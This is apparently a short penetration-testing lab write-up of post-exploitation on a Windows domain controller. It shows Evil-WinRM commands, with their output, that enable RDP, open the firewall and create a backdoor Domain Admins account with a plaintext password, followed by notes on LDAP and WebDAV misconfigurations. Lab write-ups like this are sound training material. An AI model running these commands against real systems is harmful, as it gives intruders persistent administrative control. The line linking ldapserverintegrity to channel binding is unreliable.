Beyond


This is the beyond page that an additional post enumeration and assessment are conducted as SYSTEM after compromising the target system.

*Evil-WinRM* PS C:\Users\domainadmin\Documents> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ; netsh firewall add portopening TCP 3389 "Remote Desktop"
The operation completed successfully.
 
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
 
Ok.
 
*Evil-WinRM* PS C:\Users\domainadmin\Documents> net user /ADD adm1n Qwer1234 /DOMAIN ; net group /domain "Domain Admins" /ADD adm1n
The command completed successfully.
The command completed successfully.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ xfreerdp /u:adm1n /p:'Qwer1234' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0    

RDP

LDAP


In the domain controller’s GP, Domain controller: LDAP server signing requirements is set to none

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters\ldapserverintegrity is set to 1

1 means it does not require channel binding This is what allows unauthenticated access to the LDAP server

WebDAV


WebDAV is enabled and configured to grant all user both read and write access